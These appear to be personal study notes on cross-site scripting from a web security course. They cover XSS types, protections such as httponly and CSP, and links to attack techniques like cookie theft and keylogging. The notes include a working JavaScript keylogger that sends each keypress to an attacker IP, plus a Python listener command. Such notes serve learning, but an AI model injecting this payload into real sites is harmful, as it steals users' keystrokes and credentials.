XSS

Cross-Site-Scripting (XSS) is a vulnerability based on the trust of user to visiting site. Better JS injection or HTTML injection. Because it is not necessary cross site and not necessary scripting As attackers, we are injecting code that will be executed in the victim's browser. Vaious form of protection against XSS voulnarabilities: 2023042015443939 httponly 2023042015452020 CSP

XSS Types

• 2023042615423737 Reflected Server XSS
• 2023042618302828 Stored Server XSS
• 2023042618315454 Reflected Client XSS
• 2023042618331111 Stored Client XSS

XSS attacks

• 2023042721252929 Stealing cookie XSS
• 2023042722275252 Stealing local storage XSS
• 2023042721181010 XSS external JS payload
• 2023042801143030 Keylogging XSS
• 2023042801401414 Stealing Saved Password XSS
• 2023072521342323 XSS Send request result to an attacker machine
• 2023042900595252 Phishing Users
• 202304301516077 Inject external script in url

XSS Js scripts examples

Watch what keys user press:

function logKey(e){
    console.log(e.key);
    fetch("http://192.168.49.136/k?key=" + e.key);
}

document.addEventListener('keydown', logKey);

python3 -m http.server 80

References

1. web200.Cross-Site Scripting Introduction and Discovery